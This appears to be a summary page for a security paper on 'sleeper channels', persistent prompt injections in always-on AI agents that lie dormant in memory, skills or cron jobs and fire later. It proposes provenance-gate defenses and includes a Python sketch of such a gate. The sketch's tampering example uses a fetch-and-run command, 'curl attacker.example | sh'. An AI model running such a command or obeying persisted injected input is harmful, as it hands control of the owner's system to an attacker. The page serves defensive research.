Sleeper Channels and Provenance Gates: Persistent Prompt Injection in Always-on Autonomous AI Agents

May 13, 2026

arXiv:2605.13471

cs.CR

TLDR

The paper identifies "sleeper channels," a class of persistent prompt injection in always-on AI agents, and proposes a tiered defense built on provenance gates.

Key contributions

Identifies "sleeper channels," a new persistent prompt injection vulnerability in always-on AI agents.
Demonstrates a confused-deputy cron attack on OpenClaw, showing end-to-end exploitation.
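Proposes a tiered defense (D1, D2, D3); D2 carries a soundness theorem stated against seven named deployment invariants.
Introduces "provenance gates" that key on a canonical action-instance digest with one-shot owner attestations, defeating paraphrase laundering, multi-input grant reuse, and replay.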

Why it matters

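Always-on agents fold messaging, memory, self-authored skills, scheduling, and shell into one authority boundary, so an injected input can persist and fire later with no attacker present. The paper names this class "sleeper channels" and proposes a provenance-gate defense aimed at paraphrase laundering, multi-input grant reuse, and replay. Empirical evaluation is preregistered as follow-on work.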

Original Abstract

Always-on AI agents (OpenClaw, Hermes Agent) run as a single persistent process under the owner's identity, folding messaging, memory, self-authored skills, scheduling, and shell into one authority boundary. This configuration opens what we call sleeper channels: an untrusted input to one surface persists as a memory, skill, scheduled job, or filesystem patch, then fires later through a different surface with no attacker present. Two independent axes define the class: persistence substrate and firing-separation. We walk a confused-deputy cron attack end-to-end through OpenClaw at a pinned commit. The defense is tiered (D1, D2, D3), and D2 carries a soundness theorem against seven named deployment invariants. D2 keys on a canonical action-instance digest with one-shot owner attestations, defeating paraphrase laundering, multi-input grant reuse, and replay. A companion artifact ships the gate, a static audit over the vendored source, and a runtime adapter realising five of the ten mediation hooks (H1, H2, H3, H6, H9) around the cron path (42 tests, Node ≥ 20, at https://github.com/maloyan/sleeper-channels). Empirical evaluation is preregistered as follow-on.
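
The D2 idea of keying on a canonical action-instance digest with one-shot owner attestations can be illustrated with a minimal Python sketch. This is not the paper's gate or the companion artifact's API: the names `action_digest`, `ProvenanceGate`, `attest`, and `authorize` are hypothetical, the action fields are invented for the example, and HMAC with a shared key stands in for whatever attestation scheme the authors actually use. A real deployment would presumably keep the owner's signing key outside the agent process.

```python
import hashlib
import hmac
import json
import secrets


def action_digest(action: dict) -> str:
    """Digest of one concrete action instance (hypothetical helper).

    Canonical JSON (sorted keys, fixed separators) ties the digest to the
    exact action fields rather than to how a request was worded.
    """
    canonical = json.dumps(action, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()


class ProvenanceGate:
    """Illustrative gate: an action runs only with a fresh owner attestation.

    Assumption: one object holds the owner key for both signing and checking,
    purely to keep the sketch short.
    """

    def __init__(self, owner_key: bytes) -> None:
        self._owner_key = owner_key
        self._spent = set()  # nonces that have already been consumed

    def _tag(self, digest: str, nonce: str) -> str:
        message = f"{digest}:{nonce}".encode("utf-8")
        return hmac.new(self._owner_key, message, hashlib.sha256).hexdigest()

    def attest(self, action: dict) -> dict:
        """Owner side: bind a fresh nonce to exactly one action instance."""
        digest = action_digest(action)
        nonce = secrets.token_hex(16)
        return {"nonce": nonce, "tag": self._tag(digest, nonce)}

    def authorize(self, action: dict, attestation: dict) -> bool:
        """Gate side: accept only a valid, unspent attestation for this digest."""
        expected = self._tag(action_digest(action), attestation["nonce"])
        if not hmac.compare_digest(expected, attestation["tag"]):
            return False  # attestation was issued for a different action
        if attestation["nonce"] in self._spent:
            return False  # replay of an already-used attestation
        self._spent.add(attestation["nonce"])
        return True


gate = ProvenanceGate(owner_key=b"demo-key-not-for-production")
job = {"surface": "cron", "command": "backup.sh", "schedule": "0 3 * * *"}

grant = gate.attest(job)
first = gate.authorize(job, grant)      # fresh attestation for this exact job
replayed = gate.authorize(job, grant)   # same attestation presented again

# An attestation for the original job does not cover a modified command.
altered = {**job, "command": "curl attacker.example | sh"}
tampered = gate.authorize(altered, gate.attest(job))
```

In this sketch the first authorization succeeds, the replay is rejected because the nonce is spent, and the altered job is rejected because its digest no longer matches the attested one. Binding the attestation to the digest of the concrete action, rather than to a description of it, is what lets a gate of this shape ignore rewording of the request.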


